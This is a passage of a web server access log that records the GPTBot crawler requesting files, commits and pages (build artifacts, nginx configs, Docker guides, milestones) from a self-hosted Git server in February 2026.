"/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12744] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12955] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12782] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13862] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12753] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13642] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12983] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=furthestduedate&state=all" [Client 74.7.227.38] [Length 8500] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=furthestduedate&state=open" -[17/Feb/2026:16:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" -[17/Feb/2026:16:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol" [Client 74.7.227.38] [Length 18643] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:16:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:16:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:16:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:16:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldBar.ico" [Client 74.7.227.38] [Length 24524] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" -[17/Feb/2026:16:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldBar.png" [Client 74.7.227.38] [Length 24514] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" -[17/Feb/2026:16:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fReadMe.md" [Client 74.7.227.38] [Length 26274] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" -[17/Feb/2026:16:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12987] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:06:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol" -[17/Feb/2026:16:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol" [Client 74.7.227.38] [Length 9820] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:06:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol" -[17/Feb/2026:16:06:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol" -[17/Feb/2026:16:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 10980] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12785] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13900] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12775] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude%2fsite%2fpython3.12" [Client 74.7.227.38] [Length 29189] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:16:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8505] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=closed" -[17/Feb/2026:16:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastcomplete&state=all" [Client 74.7.227.38] [Length 8499] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=open" -[17/Feb/2026:16:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22141] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:16:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22108] [Gzip 6.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:16:06:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/README.md" -[17/Feb/2026:16:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" [Client 74.7.227.38] [Length 11630] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" -[17/Feb/2026:16:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:16:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12773] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py?display=source" [Client 74.7.227.38] [Length 13704] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py?display=source" [Client 74.7.227.38] [Length 13702] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:16:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj?display=source" [Client 74.7.227.38] [Length 11545] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj?display=rendered" [Client 